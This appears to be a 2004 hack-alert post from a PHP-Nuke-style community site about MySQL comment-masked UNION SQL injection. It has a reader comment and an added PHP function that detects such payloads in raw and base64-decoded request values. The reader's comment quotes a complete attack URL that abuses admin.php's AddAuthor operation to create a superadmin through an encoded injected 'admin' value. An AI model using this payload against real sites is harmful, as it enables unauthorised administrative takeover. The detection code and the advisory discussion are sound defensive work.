There is a MySQL exploit that can be used to 'mask' the union attack. MySQL and a few other RDBMSs allow a comment /* */ to be placed in the query as a hint to MySQL to override its determined course. This is being exploited by some kiddies out there. Read about the modification to the mainfile.php code that I'm testing and I welcome your tests too.
UPDATE 4/28/2004: The hackalert download file now includes this fix. There is no need to redownload if you have already applied the fix in the post mentioned above. Thanks to those who tested this!
Posted on Tuesday, April 27, 2004 @ 11:13:57 EDT by Raven
Re: Raven's Hack Alert Script (Score: 1) by ballymuntrev (abuse@microsoft.com) on Friday, April 30, 2004 @ 12:28:13 EDT (Not registered user)
Hey Raven, is it possible to update your script to protect against the following hack, which seems to be doing the rounds :(
http://yoursite/admin.php?op=AddAuthor&add_aid=waraxe2&add_name=God&add_pwd=coolpass&add_email=foo bar com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
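The kind of check the post describes, as an added example (it is not Raven's hackalert code or the mainfile.php modification itself): strip MySQL comments from each request value before testing for UNION SELECT, and repeat the test on the base64-decoded form, since the `admin` value in the URL quoted above is base64. The function names and the sample `name` and `topic` parameters are assumptions made for illustration.

```php
<?php
// Added example; function names are hypothetical, not from the hackalert script.

// Remove MySQL comments so a masked "UNION/**/SELECT" reads as "UNION SELECT".
// A "/*" that is never closed (as in a trailing "1/*") is cut to end of string.
function strip_sql_comments(string $s): string
{
    $s = preg_replace('~/\*.*?\*/~s', ' ', $s) ?? $s;  // closed /* ... */
    return preg_replace('~/\*.*$~s', ' ', $s) ?? $s;   // dangling /*
}

// True when the value contains UNION [ALL|DISTINCT] SELECT once comments are gone.
function looks_like_union(string $value): bool
{
    $pattern = '/\bunion\b\s*(all\s+|distinct\s+)?\(?\s*select\b/i';
    return preg_match($pattern, strip_sql_comments($value)) === 1;
}

// Return the names of request parameters that carry a UNION SELECT, testing
// both the raw value and, when it is valid base64, the decoded value.
function find_union_params(array $params): array
{
    $hits = [];
    foreach ($params as $name => $value) {
        if (!is_string($value)) continue;          // nested arrays are skipped here
        $forms = [$value];
        $decoded = base64_decode($value, true);    // strict mode: false if not base64
        if ($decoded !== false) {
            $forms[] = $decoded;
        }
        foreach ($forms as $form) {
            if (looks_like_union($form)) {
                $hits[] = $name;
                break;
            }
        }
    }
    return $hits;
}

// Sample request: 'op' and 'admin' are taken from the URL quoted on this page,
// 'name' and 'topic' are constructed for the example.
$request = [
    'op'    => 'AddAuthor',
    'admin' => 'eCcgVU5JT04gU0VMRUNUIDEvKjox',
    'name'  => "x' UNION/**/SELECT 1",
    'topic' => 'trade union selection committee',
];
print_r(find_union_params($request));
```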